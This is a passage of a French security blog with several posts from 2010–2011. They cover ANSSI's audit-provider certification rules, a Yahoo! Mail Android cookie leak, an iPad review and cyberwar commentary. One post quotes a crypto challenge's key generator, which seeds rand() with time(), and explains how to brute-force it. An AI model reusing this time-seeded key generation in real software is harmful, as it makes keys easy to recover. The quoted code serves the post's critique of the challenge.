newsoft's fun blog

Les jeux sont faits

2011-12-29T14:00:00.000+01:00

Depuis le 16 décembre 2011 est en ligne la version 1.0 du Référentiel d’exigences pour la labellisation des prestataires d’audit SSI - qui font partie des PSCO (Prestataires de Services de COnfiance, une notion introduite par le RGS). D’ailleurs l’article de l’ANSSI précise que le document actuel sera intégré à la prochaine version du RGS.

Ce document - qui avait déjà fait parler de lui - n’est pas applicable en l’état : on peut lire page 7 que: « La procédure d’évaluation de la conformité des prestataires d’audit aux règles du Référentiel qui leur sont applicables fera l’objet de documents complémentaires ».

Néanmoins le document existant mérite d’être étudié, car il est appelé à devenir une référence dans les futurs appels d’offres de l’administration – du moins si un nombre suffisant d’acteurs jouent le jeu, puisqu’on peut lire sur le site de l’ANSSI que : « Les autorités administratives peuvent utiliser ce référentiel, en totalité ou en partie, dans les cahiers^[1] des charges de leurs appels d’offres de prestations d’audit. Une fois le nombre de qualification de prestataire d’audit suffisant, elles pourront également requérir que l’audit soit réalisé par un prestataire qualifié ».

Que le lecteur se rassure : je ne vais pas me lancer dans une analyse différentielle ligne à ligne des versions 0.9 et 1.0 du même document, mais plutôt jeter quelques bouteilles dans l’océan qui me sépare de l’administration.

Premier point qui me fait chaud au cœur : la page 10. Oui, vous ne rêvez pas, le terme « ingénierie inverse » fait partie des compétences nécessaires au pentester. C’est une révolution de palais – ou une facétie de l’éditeur, car ce terme n’apparaît plus en page 21 (tous les audits applicatifs nécessitent d’avoir accès au code source) ni en Annexe B (dans la liste des compétences techniques).

Deuxième point notable : il n’est plus nécessaire de savoir tout faire. Un prestataire peut être certifié sur tout ou partie des périmètres suivants :
•    Audit d’architecture
•    Audit de configuration
•    Audit de code source
•    Test d’intrusion
•    Audit organisationnel

Il est précisé toutefois page 7 qu’un prestataire ne peut pas être certifié uniquement sur le test d’intrusion ou l’audit organisationnel : « une telle activité étant jugée insuffisante si elle est menée seule ». Voilà qui risque d’éliminer un certain nombre de micro-entreprises … a contrario, j’en connais d’autres qui doivent jubiler devant une définition aussi proche de leur activité – il ne manque qu’une exigence sur les compétences juridiques et/ou CNIL pour éliminer le peu de concurrents encore en lice.

Le document se prononce également sur le délicat sujet du social engineering : on peut lire page 14 que les tests doivent être conduits « dans le respect des personnels ». Ce sujet épineux avait déjà beaucoup agité la Fédération des Professionnels du Test d’Intrusion – lorsqu’elle existait.

Enfin le document donne en page 12 la réponse à la sempiternelle question : « qu’est-ce qu’un ancien hacker » ? Dormez tranquilles : « Le prestataire d’audit peut également demander au candidat une copie du bulletin n° 3 de son casier judiciaire ». Le principe de bon sens « pas vu – pas pris » continue donc de s’appliquer. Désolé pour les « hackers repentis » … Il faut dire que les prestataires de services auraient été victimes de concurrence déloyale s’ils ne pouvaient pas recruter d’anciens hackers comme l’ANSSI ;)

Pour finir, une nouvelle compétence a fait son apparition en page 10 : « L’auditeur doit disposer de qualités rédactionnelles et de synthèse et savoir s’exprimer à l’oral de façon claire et compréhensible, en langue française ». Moi qui était déjà favorable à la dictée lors des entretiens d’embauche, voilà désormais qu’il va falloir introduire le PowerPoint Karaoké … ce qui risque d’être autrement plus sélectif que le challenge SSTIC !

Pour conclure, il est encore difficile de dire où tout cela va nous mener. Quels vont être les critères techniques d’évaluation des prestataires, particulièrement dans des sciences molles comme l’audit organisationnel ? Qui va faire passer les certifications ? Des sociétés privées mandatées par l’ANSSI ? Y aura-t-il un QCM ? Sera-t-il possible de tricher ? Et surtout : est-ce que les prestataires vont se ruer vers la certification ?

L’expérience de la CSPN semble montrer que le ratio complexité/intérêt s’est avéré trop élevé pour les prestataires d’audit comme pour les éditeurs de logiciels.

Même si ce référentiel va s’imposer de lui-même pour la prestation de service aux administrations, il n’est pas dit qu’il connaisse le même succès dans le domaine des prestations privées … surtout si un standard ou une norme - américaine ou internationale - apparaît d’ici là !

PS. Bonne année à tous ! Et oui, j’ai pris la résolution de bloguer plus en 2012 :)

[1] Je me suis permis de corriger une typo ici, car les correcteurs orthographiques Microsoft sont notoirement meilleurs que leurs équivalents Open Source ;)

Yahoo! (ou Android ?) #fail

2011-06-09T11:00:00.000+02:00

Un micro-post pour faire suite à mon intervention au SSTIC (et dissiper les malentendus lus sur Twitter).

L'application "officielle" Yahoo! Mail pour Android communique périodiquement en HTTP avec "controller.php" ... et fait fuir le cookie de session au passage.

A ne jamais utiliser sur un WiFi non protégé, donc.

Challenge #fail

2011-06-03T08:00:00.000+02:00

Je ne parle pas du Challenge SSTIC évidemment, qui était encore une fois de très bonne facture (félicitations aux gagnants … et aux organisateurs).

Je parle plutôt du Challenge iAWACS/RSSIL. Enfin le challenge officiel, pas celui qui consiste à pirater des sites Internet en live et pouvoir rentrer chez soi tranquillement.

Le principe de ce challenge est simple: deux fichiers chiffrés avec un algorithme “maison” sont publiés. La première personne capable de produire les fichiers source gagne 3000€.

Bien entendu, afin de respecter le principe de Kerckhoffs, l’algorithme utilisé a également été publié. Le challenge consiste donc à cryptanalyser cet algorithme. Ou plutôt devrait consister.

En effet, une lecture attentive des sources permet d’identifier la séquence de code suivante:

PUNCT_CONC_CODE * generateCode()
{
(...)
now = time(NULL);
while(now == (time_t)(-1)) now = time(NULL);
srand(now);

(...)

Et dans le programme de test:

aKey->INIT1 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());
aKey->INIT2 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());
aKey->INIT3 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());
aKey->INIT4 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());

Sachant que la définition de la macro alea() est plutôt simple:

/* alea(): a random float in [0, 1] */
#define alea() (rand()/(RAND_MAX + 1.0))

Le lecteur averti aura remarqué que la simple connaissance du time() – en secondes - à l’instant de la génération du fichier permet de casser entièrement le challenge. Même en visant large - disons 1 an – la complexité calculatoire reste donc inférieure à 2²⁵.

Je ne cours pas après l’argent, mais 3000€ en 10 minutes reste une affaire rentable :) Toutefois les deux fichiers fournis présentent un entête qui ne semble pas provenir de la librairie fournie par l’auteur.

$ xxd -l 64 challenge_lipperseus1
0000000: 4631 3232 3938 4630 3030 0067 51b3 df01 F12298F000.gQ...
0000010: b663 4b33 4565 0637 0c1f 7912 4e39 64e5 .cK3Ee.7..y.N9d.
0000020: 7f71 3678 5438 2276 3c34 4726 13b8 6b37 .q6xT8"v<4G&..k7
0000030: 3a4a d9c5 3f9c 6d43 ccc6 37f8 59ec 33df :J..?.mC..7.Y.3.
$ xxd -l 64 challenge_lipperseus2
0000000: 4638 3230 3946 3030 3030 ad94 31b0 1ec1 F8209F0000..1...
0000010: 82c1 4de0 9c97 2797 52f1 458a 5b40 2fe7 ..M...'.R.E.[@/.
0000020: 09b8 fe85 2ea7 2f7a 186b 277f 65a4 5275 ....../z.k'.e.Ru
0000030: 6cfb 845d c6a7 32b3 9141 db25 3526 456b l..]..2..A.%5&Ek

D’ailleurs, la librairie disponible en ligne ne compile même pas à cause d’une typo. Il est donc difficile de croire que les fichiers aient été “produit directement à partir de ce code source” ;)

Je m’enquière donc du programme original (principe de Kerckhoffs, toujours). Et visiblement je ne suis pas le seul à avoir remarqué le problème.

L’affaire aurait pu en rester là, mais l’auteur a cru bon de répondre. Et là, à défaut d’un gros chèque, je tenais un solide blogpost ;)

Je vous laisse lire la réponse en question, car chaque ligne est délectable. Vraiment. Tenter de la résumer en quelques lignes serait risquer d’en perdre le substantifique fiel. Sans parler du blogpost d’origine qui a lui aussi été édité (oh la vilaine pratique).

Dans tous les cas, en ce qui me concerne, je vais continuer à penser “que les attaquants feront toujours des erreurs exploitables”, puisque l’usage de rand() pose toujours autant de problèmes en 2011 qu’en 2008 … ou qu’en 2003.

Le diable est dans les détails

2011-05-16T08:00:00.001+02:00

Ainsi donc l'activité d'audit sécurité va être réglementée en France. Le projet est encore en phase expérimentale, mais le processus étant enclenché, il est inéluctable (modulo le temps de convergence des autorités concernées). Il faut dire que l'ARJEL avait déjà ouvert cette voie[1] en fournissant une liste d'organismes certificateurs.

C'est une idée qui circule depuis quelques temps, sans que j'en aie bien compris les avantages. Car si tout un chacun peut effectivement constater que le marché est inondé par des charlatans ou des sociétés unipersonnelles[2], l'apport effectif d'une réglementation reste à prouver. En théorie "la main invisible du marché" est censée faire son travail. Et elle le fait plutôt bien: la plus grosse partie de l'activité fonctionne par bouche à oreille. Quant aux "tests d'intrusion qui n'intrusent pas", ils correspondent aussi à une demande de certains clients: les mauvais ont donc leur place dans l'écosystème, c'est pour cela qu'ils y survivent.

Maintenant regardons de plus près l'avant-projet produit par l'ANSSI (version 0.9).

Chapitres 3 et 4: de la mesure des compétences techniques

Ce qui frappe en premier lieu, c'est le très haut niveau d'exigence requis par ce document. J'ai immédiatement pensé à la VAE ESSI, qui nécessite des compétences aussi diverses que la cryptographie, l'intelligence économique, la gestion d'une équipe et d'un budget, et un anglais parfait. Au passage, si quelqu'un a des chiffres sur le nombre de VAE ESSI délivrées, merci de les poster en commentaire …

Dans l'avant-projet, on peut lire que "le prestataire d'audit doit s'assurer que les compétences [techniques | organisationnelles], théoriques et pratiques, de l'ensemble des auditeurs qu'il emploie couvre les domaines suivants […]". S'en suit une longue liste à la Prévert, allant des systèmes & réseaux, du développement d'outils intrusifs[3], à la maitrise de la norme ISO 27001, de la méthode EBIOS et du RGS, entre autres. Cette liste est détaillée dans les grandes largeurs en annexe A.

Puisque nous sommes dans le chapitre 3, cette exigence s'applique a priori à la société prestataire et pas à chaque auditeur individuellement. Mais la plupart des prestataires de taille moyenne (disons, moins de 20 personnes) - et il en existe beaucoup dans le secteur - sont quasiment assurés d'avoir un "trou dans la raquette" … Quant aux autres, il restera très difficile de valider que toutes les compétences soient disponibles, persistantes (dans un contexte de turn-over important), et utilisées si la mission le requière.

Dans le chapitre 4 - qui concerne les auditeurs eux-mêmes - il est recommandé que les auditeurs, disposent d'un bac+5 reconnu d'état, justifient en sus de 2 ans d'expérience en informatique "pure", 1 an d'expérience en sécurité, et 1 an d'expérience en audit. Autant dire qu'on n'est pas loin du mouton à 5 pattes, surtout avec les difficultés de recrutement actuelles (et futures, à en juger par la production du système éducatif dans le domaine).

De mon expérience, la mesure objective des compétences techniques est un exercice très difficile … et inutile.

Difficile, car à moins d'enfermer le candidat dans une pièce pendant des heures (sans accès Internet) pour le faire plancher sur des travaux pratiques, il n'est possible d'estimer "au jugé" qu'une infime partie des compétences annoncées sur le CV (dont la liste dépasse souvent les 50 entrées).

Comme l'ANSSI, nous disposons d'un questionnaire technique "infaisable"[4] qui sert uniquement à disqualifier de manière objective un candidat "qu'on ne sent pas". Mais un simple QCM ne peut pas valider des compétences techniques très poussées (tout au plus peut-il servir à délivrer une certification ;).

Inutile, car c'est plus la capacité à apprendre rapidement qui est importante. Le document cite des technologies de bases de données: Oracle, MS-SQL, MySQL et PostgreSQL. Mais j'ai également été confronté à SolidDB (produits Cisco), Access, SQLite (Android), Sybase SQL Anywhere, et probablement d'autres oubliés depuis.

Or aucune société ne peut maintenir à jour des auditeurs sur toutes ces technologies: ce qui compte c'est la rapidité avec laquelle l'auditeur appréhende une nouvelle technologie. Tout candidat qui n'a pas déjà réellement utilisé au moins 3 systèmes d'exploitation, 3 architectures matérielles, et 3 langages de programmation est pour moi un rookie (quelle que soit son expertise dans un domaine très pointu tel que "l'assembleur Intel x86 en environnement Microsoft Windows").

L'exemple des challenges de sécurité (tels que celui du SSTIC) est frappant: le top 10 est à peu près toujours le même. Or je ne peux pas croire que les gagnants récurrents ont étudié a priori des technologies aussi variées que le mode V8086 du processeur Intel ou le système d'exploitation Android. Ils ont appris sur le tas, en temps contraint. C'est à mon avis la seule qualité nécessaire à la pratique du test d'intrusion, compte-tenu de la diversité des missions et de l'environnement technologique mouvant dans lequel nous évoluons.

Chapitre 5: incise sur l'obsolescence des technologies

Le chapitre 5, comme l'Annexe A, contiennent des détails techniques tout à fait inattendus.

Il est question de chercher des failles de type Cross-Site Scripting (le terme n'a pas été francisé ;), injection SQL, et Cross-Site Request Forgery. Pourtant la liste des erreurs potentielles est bien plus longue.

Il me semble ambitieux de citer des technologies, voire des produits commerciaux, dans un document de référence sur les technologies que doit maitriser un auditeur ou un prestataire d'audit. Il m'a déjà été donné de voir du code FORTRAN en audit, tout autant que des applications Android. Comme explicité précédemment, c'est la maitrise de quelques concepts fondamentaux et la capacité à apprendre qui me semblent essentiels à mesurer.

Le paradoxe français, premier acte

J'aimerais ici parler du voile pudique jeté sur l'audit d'applications en source fermée.

Compte-tenu des technologies mentionnées en annexe, on sent que le document s'applique à un nombre limité de prestations d'audit: les réseaux internes, les réseaux d'interconnexion, les applications Web, la téléphonie (sur IP … ou pas), et les environnements virtualisés.

Exit donc par exemple les audits de systèmes embarqués (comme les imprimantes, les caméras WiFi les caisses de cantine ou les badgeuses). Le cas de "l'audit d'applications lourdes de type client/serveur" est réglé en une ligne dans l'annexe ... Quant au problème du Cloud Computing, il ne semble pas encore avoir atteint l'administration:

"Les tests d'intrusion ne devraient pas être réalisés sur des plate-formes d'hébergement mutualisées."

D'après ce document, aucune compétence en reverse engineering n'est donc requise pour être un excellent auditeur sécurité. Ce qui est bien entendu faux dans la pratique, ne serait-ce que pour le développement des codes d'exploitation dont il va être question juste après.

Le paradoxe français, deuxième acte

Bien entendu, l'administration se doit d'être exemplaire et ne peut mentionner la pratique du reverse engineering dans un document officiel. D'ailleurs il est bien précisé que: "f) Le prestataire d'audit est tenu de respecter la législation et la réglementation en vigueur […]".

Mais là où ça devient cocasse, c'est lorsqu'il est dit plus loin que: "Le prestataire d'audit doit fournir, à la fin de l'audit, les développements spécifiques réalisés lors de l'audit pour valider les scénarios d'exploitation des vulnérabilités. Ces développements peuvent être fournis sous la forme de scripts ou de programmes compilés, accompagnés de leur code source, ainsi que d'une brève documentation de mise en œuvre et d'utilisation".

Non seulement il me semble difficile de mettre au point des codes d'exploitation sans pratiquer un minimum de reverse engineering (passons là-dessus), mais surtout cela me semble tout à fait coller avec ce texte (pour avoir fait l'expérience de la rigueur avec laquelle il était interprété par les instances de la SSI française):

"Le fait, sans motif légitime, d'importer, de détenir, d'offrir, de céder ou de mettre à disposition un équipement, un instrument, un programme informatique ou toute donnée conçus ou spécialement adaptés pour commettre une ou plusieurs des infractions prévues par les articles 323-1 à 323-3 est puni des peines prévues respectivement pour l'infraction elle-même ou pour l'infraction la plus sévèrement réprimée."

En clair, livrer à ses clients des exploits "clé en main", c'est (probablement) mal.

Des chiffres et des lettres (et des couleurs, aussi)

Un dernier point qui me tient à cœur, c'est la caution officielle apportée aux matrices de risque, d'impact, etc. qui doivent enrichir et colorer[5] le rapport.

Pour mémoire, ces matrices ont pour but:

De lutter contre les consultants qui n'hésitent pas à faire mousser la production d'un outil automatique et brodent sur la dangerosité des "ICMP Timestamp".
D'en faire le moins possible après l'audit (c'est-à-dire d'économiser des sous), en supprimant toute action qui n'a pas été parée de rouge[6] dans le rapport.

En ce qui me concerne, j'essaie de résoudre le problème à la source: la seule classification que j'utilise dans les rapports est PWN ou PAS PWN. Ce qui évite de ratiociner pendant des heures sur la criticité d'une faille sur une échelle de 0 à 4, 10 ou 20.

En guise de conclusion

Il y a de bonnes idées dans ce document.

Par exemple, il y est rappelé que le test d'intrusion ne prend tout son sens qu'en complément d'un audit préalable du système (au sens large), d'abord dans le chapitre 2:

"Un test d'intrusion seul n'a pas vocation à être exhaustif. En revanche, il s'agit d'une activité qui peut être effectuée en complément des activités décrites dans les chapitres 2.1, 2.2, 2.3, 2.4 afin d'en améliorer l'efficacité (…)".

… mais surtout en annexe B:

"En revanche, l'activité de test d'intrusion ne devrait jamais être réalisée seule et sans aucune autre activité d'audit."

Cette même annexe B rappelle que l'audit "à l'arrache" d'un sous-système juste avant sa mise en production est inefficace, voire contre-productive:

"Les audits devraient être le plus exhaustif possible (…)".

Personne ne me demande mon avis, mais puisque je suis sur mon blog, je vais le donner quand même :)

Il me semble qu'une certification aussi ambitieuse, à destination essentiellement des grosses entreprises, va:

Disqualifier tout un tas de petits prestataires pourtant très compétents dans leur(s) domaine(s).
Etre inapplicable en pratique, particulièrement dans la phase d'évaluation des compétences (aussi bien collectives qu'individuelles).

Enfin ce document continue à nier la réalité de l'activité d'audit sécurité, ce dont Cédric s'est par ailleurs ému sur son blog, et ne règle pas le problème du bootstrapping (comment former des auditeurs qualifiés alors qu'il faudrait une vie pour acquérir les compétences recommandées à titre individuel).

Voici donc une proposition alternative:

Faire du métier d'auditeur en sécurité une profession réglementée (sur le modèle des notaires, des pharmaciens, des médecins, etc.).
Certifier les personnes sur leurs compétences (un gynécologue n'est pas un urologue), en organisant de réelles sessions d'examens.
Exiger (éventuellement) un renouvellement périodique de la certification.
Créer une instance représentative de la profession, qui collecterait tous les rapports d'audit, ce qui permettrait d'avoir un catalogue de produits audités un peu plus étoffé que celui de la CSPN. Cette instance pourrait éventuellement servir d'interface avec les éditeurs logiciels, ou de tiers de confiance pour l'achat/revente de codes d'exploitation (missions qui ne sont pas actuellement dans les compétences du CERTA, sauf erreur de ma part).

Les commentaires sont ouverts.

[1] Comme celle du filtrage d'Internet diront les mauvaises langues.
[2] HSC n'en est plus une depuis quelques temps.
[3] Avec un "motif légitime" je suppose.
[4] Curieusement, aucun candidat n'a été capable de reconnaitre une implémentation MD5 en assembleur MIPS à ce jour.
[5] Sauf avec Latex, puisqu'on ne peut pas mettre de couleurs dans les tableaux.
[6] Certains préfèrent le noir pour les failles critiques, les goûts et les couleurs …

Une semaine avec l'iPad

2011-01-31T08:00:00.012+01:00

Il se trouve que j'ai récupéré par hasard un iPad, dans des circonstances qui ne peuvent s'expliciter qu'autour d'une bonne bière. N'ayant aucune attente particulière par rapport à cet objet - qui commence à fasciner et inquiéter les entreprises - je vais donc pouvoir en faire un compte-rendu dépassionné et objectif.

Pour commencer, l'engin est assez élégant, quoique pesant. On reconnait la qualité du design Apple, y compris en ce qui concerne l'emballage.

La prise en main est bonne - il y a peu de chances de le laisser choir par inadvertance.

Ce qui ne marche pas

A l'usage, voici plusieurs lacunes qui apparaissent assez rapidement:

Tout d'abord, ça n'est pas l'objet ubiquiteux qu'on nous promet. J'ai un toujours un téléphone dans la poche, mais emporter son iPad demande une certaine planification (y a-t-il un vestiaire à destination, etc.). Et le sortir dans le métro pour lire son journal favori relève encore de la science-fiction.
C'est très cher à l'usage. Autant l'iPhone nous avait habitués à des applications gratuites (en version bridée, ou financée par la publicité), autant les applications iPad se destinent immédiatement à un public de gens "qui ont les moyens".
Même les applications gratuites font un usage intensif du "in app purchase". Laisser ses enfants jouer avec l'iPad peut rapidement se transformer en drame. Le jeu "village des schtroumpfs" en est la caricature: tous les éléments du jeu sont payants. Si les enfants aiment la salsepareille, papa va devoir sortir l'oseille …
L'absence de multifenêtrage fait cruellement défaut quand on vient de la bureautique traditionnelle. Impossible de copier/coller rapidement un morceau de texte d'une application dans une autre: il faut suspendre la première application, ouvrir la deuxième, puis revenir à la première …
La communication avec le monde extérieur se limite au navigateur Web (impossible de brancher une clé USB par exemple). Du coup la suite d'applications Google devient rapidement indispensable pour entrer et sortir de l'engin (prendre des notes, sauvegarder des signets, etc.)
Impossible d'avoir confiance dans les applications disponibles sur l'App Store. Il existe bien des clients RDP et SSH gratuits par exemple, mais il faut réaliser un sérieux background check sur l'éditeur avant de saisir son mot de passe root dans une telle application.
Mon efficacité au clavier virtuel reste inférieure à celle d'un clavier réel, en particulier à cause de la séparation entre lettres, chiffres et signes de ponctuation dans trois claviers distincts. Autant dire que taper des lignes de commandes shell avec un clavier virtuel relève de l'épreuve de nerfs. Les gens qui utilisent des mots de passe robustes prennent rapidement l'habitude de les mémoriser dans les applications ...
Il est impossible d'imprimer (par exemple un plan Mappy).

Maintenant il est clair que cet objet remplit parfaitement son rôle dans plusieurs domaines.

Ce qui marche

Sa supériorité sur un PC (et sa qualité principale à mon avis) c'est que … ça marche ! Grâce à la maitrise complète du matériel et du système d'exploitation par Apple, et au cloisonnement des applications tierces, plus besoin de se préoccuper d'une incompatibilité entre un antivirus et une protection logicielle par exemple …

Sans parler des problèmes de drivers insurmontables sur PC (surtout depuis la cohabitation entre drivers Windows XP, drivers Windows Seven 32 bits, et drivers Windows Seven 64 bits - lorsqu'ils existent). Sur mon Dell E4300, même en installant la "suite de sécurité Trust Wave Embassy" livrée par Dell, je ne sais pas comment utiliser le lecteur d'empreinte digitale ou le lecteur RFID intégré. Quant au "hub de sécurité Broadcom", il contient des commandes cachées[1], et ne peut être reflashé officiellement que sous MS-DOS. De même pour la carte 3G intégrée[2], qui est horriblement instable par ailleurs.

Alors que sous iPad … tous les périphériques (WiFi, accéléromètre, etc.) fonctionnement out of the box !

La gestion de l'énergie est également un point fort de l'appareil. Plusieurs jours d'autonomie en veille, plusieurs heures en fonctionnement, et surtout un allumage instantané.

A contrario, sous Windows et encore plus sous Linux, la gestion de l'énergie a toujours été un problème insurmontable:

Autonomie ne dépassant pas les 4h quel que soit le matériel.
Charge erratique (Windows et Linux ne s'accordent pas sur la capacité et la performance de ma batterie).
Impossibilité de prévoir l'autonomie réelle lorsque la batterie se dégrade (ce qui arrive de plus en plus rapidement).
Modes de fonctions incompréhensibles (veille, veille hybride, hibernation) et ne fonctionnant pas toujours (selon le matériel ou le support du noyau).
Mise en veille ne fonctionnant pas à cause d'un driver bogué.
Allumage intempestif de la machine (par exemple pour installer des correctifs de sécurité[3]).
Et surtout … plusieurs secondes pour sortir de veille dans tous les cas.

Dès qu'il me faut consulter rapidement un article ou un plan, je sors désormais l'iPad - je sais que j'en ai pour moins de 5 secondes et que je peux m'interrompre à tout moment sans risquer de tout perdre.

Quant aux logiciels, on trouve par exemple des jeux de qualité tout à fait correcte pour moins de 10 euros. Disponibles immédiatement et sans problèmes de protections logicielles incompatibles.

Enfin l'écran tactile est un must pour les jeunes enfants qui ne peuvent pas se servir d'un clavier et d'une souris. D'ailleurs les éditeurs ne s'y sont pas trompés et proposent de nombreuses applications pour les plus jeunes (livres interactifs, jeux, etc.). En 10 minutes, un enfant de 18 mois maitrise complètement l'interface graphique (y compris l'allumage et le déverrouillage) - il est autonome sur n'importe quel jeu (testé et approuvé).

Conclusion

En bref, l'iPad n'est pas cet engin révolutionnaire et indispensable qui vous est décrit par les fanboys ayant fait la queue pour dépenser leurs 500€ (au bas mot et hors frais d'utilisation).

Mais quand on manipule l'engin au quotidien, on réalise à quel point l'informatique "traditionnelle" s'est endormie dans un statu quo frustrant pour les utilisateurs, qui ont pris l'habitude de travailler avec des systèmes contre-intuitifs, lents et difficiles à maintenir, alors que rien ne le justifie vu l'argent injecté chaque année dans l'industrie logicielle.

C'est pourquoi je ne jetterais pas Chrome OS avec l'eau du bain comme le fait Gartner. En repensant les fondements de l'informatique (mais à quoi peut bien servir un BIOS en 2011 ?) et en s'appuyant sur les interfaces graphiques conviviales du Web 2.0, Google a une chance lui aussi de secouer le cocotier avec un produit un peu différent dans l'esprit (ne serait-ce que par son facteur de forme).

Quant aux entreprises, il leur faudra bien renoncer un jour à leurs applications VB6 et IE6, sous peine de se retrouver avec une informatique tellement dépassée que la "cloudification" massive (et tant redoutée) sera le fait des utilisateurs mécontents. Mais ceci est une autre histoire …

Billet rédigé avec Windows Live Writer 2011

[1] http://natisbad.org/E4300/
[2] http://natisbad.org/E4300/Dell_Wireless_5530_AT_cmd_ref.html
[3] http://www.nynaeve.net/?p=160

CyberWar AfterMath

2010-12-13T08:00:00.004+01:00

J'ai reçu un abondant courrier des lecteurs (ou plutôt un téléphone arabe des lecteurs devrais-je dire) autour de mon dernier billet, se résumant en gros à un déluge de critiques fondées sur ma prétendue illégitimité dans le domaine (pour simplifier).

Il est vrai que je n'ai pas eu l'occasion de présenter dans des conférences spécialisées, ou de participer à des "cyber-exercices" (même si je vais me permettre de bloguer là-dessus prochainement).

Mais puisque la première cyberguerre mondiale n'a pas encore eu lieu, il me semblait pourtant que mon opinion sur le sujet était tout aussi recevable que celle de n'importe qui - tout le monde en est réduit à des spéculations dans le domaine.

J'oserais même penser qu'en tant que professionnel de l'informatique, mon opinion est plus qualifiée. Car si tout le monde peut intuiter la dangerosité d'une grenade ou d'une baïonnette sans jamais en avoir utilisé une, il en est autrement dans le domaine informatique où aucune analogie avec le monde physique ne fonctionne. Les théoriciens de la cyberguerre n'ont pour la plupart aucune idée de ce qui se produit lorsqu'ils allument leur téléphone ou lorsqu'ils envoient un email. Ce qui les conduit à des conclusions absurdes, comme ~~HADOPI~~ l'installation d'un bot contrôlé par le gouvernement américain sur le PC de tout bon citoyen, ou le bouton rouge qui permet d'arrêter Internet.

Il en est ainsi des domaines techniques comme l'informatique ou la réparation de télé: personne ne peut avoir d'intuitions sans expérience. Le problème c'est qu'en informatique comme dans beaucoup de domaines de la vie courante (l'économie, la politique, etc.), absolument tout le monde a une solide opinion.

La différence entre un professionnel de l'informatique et un technicien, voire un simple utilisateur, est la même qu'entre un prof de maths qui enseigne en prépa et un prof de collège. Le premier doit faire face constamment à des situations qui le poussent aux limites de ses capacités, tandis que le second rabâche à des ignorants des concepts à apprendre par cœur (ton mot de passe doit être complexe, tu ne dois pas le noter sur un post-it, tu dois utiliser un antivirus, etc.).

Bien sûr, dans l'éducation nationale comme dans l'informatique, il existe de vrais passionnés à tous les niveaux, qui s'attaquent à des problèmes non résolus – le plus souvent sur leur temps libre.

Malheureusement, au bout du compte, l'opinion majoritaire reflétée par les médias et couramment admise (même au plus haut niveau) est bien loin des réalités techniques les plus élémentaires. Si vous avez 30 minutes à perdre, et que vous voulez vous payer une bonne tranche de rigolade, je vous conseille de regarder un récent reportage intitulé "les nouveaux pirates de l'informatique", suivi par "alerte à la cyberguerre". C'est disponible partout sur Internet, mais je ne peux pas vous donner de lien ici – seul Google a le privilège d'être au-dessus des lois.

Revenons à nos moutons

Ce débat sur la cyberguerre est né de mes réflexions sur StuxNet. Tout le monde s'extasie sur la "complexité" d'un tel code. Au gré des conférences ou de mes lectures sur Internet, j'ai pu entendre que StuxNet représentait 9 mois*hommes de travail, ou 10 millions de dollars. Ces chiffres sont bien entendu totalement fantaisistes, puisque le pays d'origine du virus – et donc le salaire moyen des développeurs – reste inconnu :)

On peut noter toutefois que la complexité d'un tel code est largement surestimée par les personnes qui ne sont pas des professionnels de l'informatique – tout comme un collégien va trouver la démonstration du grand théorème de Fermat incroyablement complexe, ce qui n'est pas forcément l'avis d'un professeur de prépa.

Prenons le cas du laboratoire privé Sogeti/ESEC. Malgré les fonds et les effectifs limités dont ils disposent, ils viennent pourtant de réimplémenter une attaque sur des cartes réseau, dont l'implémentation précédente était le fait d'un laboratoire de l'ANSSI. Est-ce à dire que "cinq gus dans un garage" peuvent rivaliser avec les services de l'état ? Je pense que oui (au facteur d'échelle près, les ressources de l'état étant illimitées), car la sécurité informatique est avant tout une affaire de matière grise – une ressource impossible à produire et difficile à capter.

Les techniciens informatiques (et a fortiori le grand public) sous-estiment les capacités des "vrais" hackers de plusieurs ordres de magnitude. Un seul homme (ou femme :) vraiment compétent remplace aisément 10 à 100 informaticiens peu motivés comme on en rencontre presque partout. Les exemples de Google (ou de Free) sont là pour nous le rappeler.

Pourquoi on ne voit rien … et ce qui se passe vraiment

Ce biais de perception provient essentiellement de la structuration du monde de la sécurité (aussi appelé le Security Circus).

Il faut bien comprendre que toutes les publications (dans les magazines ou les conférences) sont intrinsèquement sans valeur: ce ne sont ni des résultats produits pour des clients, ni des attaques dangereuses ou illégales, ni des technologies revendables ou brevetables.

Tout ce qui est réellement dangereux, parfois à la limite de la légalité, passe complètement en dessous du radar et "n'existe pas" pour la presse et le grand public en général. Et pourtant cette "masse manquante" représente l'essentiel des travaux produits par les professionnels de la sécurité dont l'activité présente suffisamment d'intérêt pour être financée (c'est-à-dire ceux qui en vivent d'une manière ou d'une autre).

Vu de l'extérieur, ceci donne l'impression que ce petit monde ronronne gentiment, de sauteries en conférences, sans vraiment empêcher le business de tourner rond. Ce qui est loin d'être représentatif de l'état de la menace aujourd'hui …

En vérité, tous les systèmes connectés à Internet sont sous le feu permanent d'intrus (qu'on va appeler "les chinois" pour simplifier – et c'est probablement d'ailleurs le cas). Suis-je mythomane ? Probablement pas, car j'ai eu l'occasion de les rencontrer "pour de vrai" à plusieurs reprises …

La véritable cyberguerre a déjà commencé, mais elle ne ressemble pas à ce qu'on nous présente d'habitude (pays désorganisé, infrastructures critiques en panne, etc.). Pour cela, quelques centimètres de neige suffisent :)

La véritable cyberguerre, c'est le pillage systématique de toutes les ressources technologiques occidentales par des individus entrainés, opiniâtres, et opérant en dehors de toute juridiction. Toutes les entités, des instances étatiques à la plus petite PME, sont victimes de ce ratissage systématique opéré par des attaquants qui ne connaissent pas le repos ni la compassion.

Là où les cybergénéraux attendent des DDoS massifs, par analogie avec les bombardements bien connus dans le monde physique, le réel danger provient de la cinquième colonne qui a probablement infiltré tous les systèmes connectés à Internet à l'heure où j'écris ces lignes (l'opération Aurora n'étant que la partie émergée de l'iceberg).

Une autre cyberguerre est possible

Ce qui se passe actuellement avec le site WikiLeaks me semble également relever de la cyberguerre, du moins de l'attaque non conventionnelle.

En me gardant bien de me prononcer sur le fond, cet épisode met en évidence la dépendance très forte du "cybermonde" vis-à-vis d'entités commerciales américaines bien réelles (à savoir EasyDNS, Paypal, MasterCard, Visa, … dans le cas présent).

Sans rentrer dans des scénarios trop compliqués, on imagine assez aisément que si demain un secrétaire d'état américain demande à l'ICANN, Microsoft, VeriSign, Cisco, et tous les opérateurs Tier-1 américains de bloquer les infrastructures d'un pays occidental, le résultat risque d'être assez catastrophique … et ce sans utiliser un seul virus !

Tout comme la redirection de l'Internet mondial au travers d'un opérateur chinois pendant une vingtaine de minutes (avril 2010) expose une autre fragilité rarement abordée dans les cyberdoctrines: BGP.

Conclure sur StuxNet

